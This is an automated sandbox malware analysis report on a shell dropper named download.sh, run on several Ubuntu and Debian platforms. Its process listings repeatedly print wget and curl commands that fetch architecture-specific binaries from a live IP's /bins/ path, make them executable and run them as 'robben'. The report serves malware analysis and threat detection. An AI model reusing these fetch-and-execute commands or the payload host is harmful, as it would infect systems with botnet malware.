Malware Analysis Report

2025-01-23 15:24

Sample ID 240822-1l9gmasbjn
Target download.sh
SHA256 19ae1084b4322732191f0325600ae869eb0527f11e5b2c2a7095fe14adaa1902
Tags
antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

19ae1084b4322732191f0325600ae869eb0527f11e5b2c2a7095fe14adaa1902

Threat Level: Shows suspicious behavior

The file download.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

antivm

Executes dropped EXE

Checks CPU configuration

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-22 21:45

Signatures

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:51

Platform

ubuntu2004-amd64-20240611-en

Max time kernel

133s

Max time network

183s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/download.sh N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/usr/bin/cat

[cat i586]

/usr/bin/chmod

[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/usr/bin/cat

[cat i686]

/usr/bin/chmod

[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 158.51.127.106:80 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
GB 185.125.190.96:80 connectivity-check.ubuntu.com tcp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:51

Platform

debian12-armhf-20240221-en

Max time kernel

280s

Max time network

325s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/download.sh N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/usr/bin/cat

[cat i586]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/usr/bin/cat

[cat i686]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
US 1.1.1.1:53 debian12-armhf-20240221-en-12 udp
US 1.1.1.1:53 debian12-armhf-20240221-en-12 udp
US 1.1.1.1:53 debian12-armhf-20240221-en-12 udp
US 1.1.1.1:53 debian12-armhf-20240221-en-12 udp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:51

Platform

debian12-mipsel-20240221-en

Max time kernel

300s

Max time network

304s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/download.sh N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-8aaf9894ee06476383bd6e60f2d5c264-systemd-logind.service-jplWFO]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-8aaf9894ee06476383bd6e60f2d5c264-systemd-logind.service-jplWFO]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
US 1.1.1.1:53 debian12-mipsel-20240221-en-8 udp
US 1.1.1.1:53 debian12-mipsel-20240221-en-8 udp
US 1.1.1.1:53 debian12-mipsel-20240221-en-8 udp
US 1.1.1.1:53 debian12-mipsel-20240221-en-8 udp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:51

Platform

debian9-armhf-20240611-en

Max time kernel

248s

Max time network

281s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/download.sh N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/bin/cat

[cat mipsel]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:51

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

299s

Max time network

300s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/download.sh N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x config-err-zQnUeG download.sh netplan_agvzkkfx robben snap-private-tmp ssh-RkhVVFBqnqXf systemd-private-0104f6e541f146c1821cb46a7d879e9a-bolt.service-JTmSDM systemd-private-0104f6e541f146c1821cb46a7d879e9a-colord.service-j4FNmX systemd-private-0104f6e541f146c1821cb46a7d879e9a-ModemManager.service-daBbJ3 systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-resolved.service-1lnNMf systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-timedated.service-NrPp8B]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x config-err-zQnUeG download.sh netplan_agvzkkfx robben snap-private-tmp ssh-RkhVVFBqnqXf systemd-private-0104f6e541f146c1821cb46a7d879e9a-bolt.service-JTmSDM systemd-private-0104f6e541f146c1821cb46a7d879e9a-colord.service-j4FNmX systemd-private-0104f6e541f146c1821cb46a7d879e9a-ModemManager.service-daBbJ3 systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-resolved.service-1lnNMf systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-timedated.service-NrPp8B]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/bin/cat

[cat mipsel]

/bin/chmod

[chmod +x config-err-zQnUeG download.sh netplan_agvzkkfx robben snap-private-tmp ssh-RkhVVFBqnqXf systemd-private-0104f6e541f146c1821cb46a7d879e9a-bolt.service-JTmSDM systemd-private-0104f6e541f146c1821cb46a7d879e9a-colord.service-j4FNmX systemd-private-0104f6e541f146c1821cb46a7d879e9a-ModemManager.service-daBbJ3 systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-resolved.service-1lnNMf]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x config-err-zQnUeG download.sh netplan_agvzkkfx robben snap-private-tmp ssh-RkhVVFBqnqXf systemd-private-0104f6e541f146c1821cb46a7d879e9a-bolt.service-JTmSDM systemd-private-0104f6e541f146c1821cb46a7d879e9a-colord.service-j4FNmX systemd-private-0104f6e541f146c1821cb46a7d879e9a-ModemManager.service-daBbJ3 systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-resolved.service-1lnNMf]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x config-err-zQnUeG download.sh netplan_agvzkkfx robben snap-private-tmp ssh-RkhVVFBqnqXf systemd-private-0104f6e541f146c1821cb46a7d879e9a-bolt.service-JTmSDM systemd-private-0104f6e541f146c1821cb46a7d879e9a-colord.service-j4FNmX systemd-private-0104f6e541f146c1821cb46a7d879e9a-ModemManager.service-daBbJ3 systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-resolved.service-1lnNMf]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x config-err-zQnUeG download.sh netplan_agvzkkfx robben snap-private-tmp ssh-RkhVVFBqnqXf systemd-private-0104f6e541f146c1821cb46a7d879e9a-bolt.service-JTmSDM systemd-private-0104f6e541f146c1821cb46a7d879e9a-colord.service-j4FNmX systemd-private-0104f6e541f146c1821cb46a7d879e9a-ModemManager.service-daBbJ3 systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-resolved.service-1lnNMf]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/bin/cat

[cat arm7]

/bin/chmod

[chmod +x config-err-zQnUeG download.sh netplan_agvzkkfx robben snap-private-tmp ssh-RkhVVFBqnqXf systemd-private-0104f6e541f146c1821cb46a7d879e9a-bolt.service-JTmSDM systemd-private-0104f6e541f146c1821cb46a7d879e9a-colord.service-j4FNmX systemd-private-0104f6e541f146c1821cb46a7d879e9a-ModemManager.service-daBbJ3 systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-resolved.service-1lnNMf]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
US 151.101.193.91:443 tcp
N/A 224.0.0.251:5353 udp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.193.91:443 tcp
GB 89.187.167.9:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 89.187.167.38:443 1527653184.rsc.cdn77.org tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
GB 185.125.190.97:80 connectivity-check.ubuntu.com tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:51

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

270s

Max time network

276s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
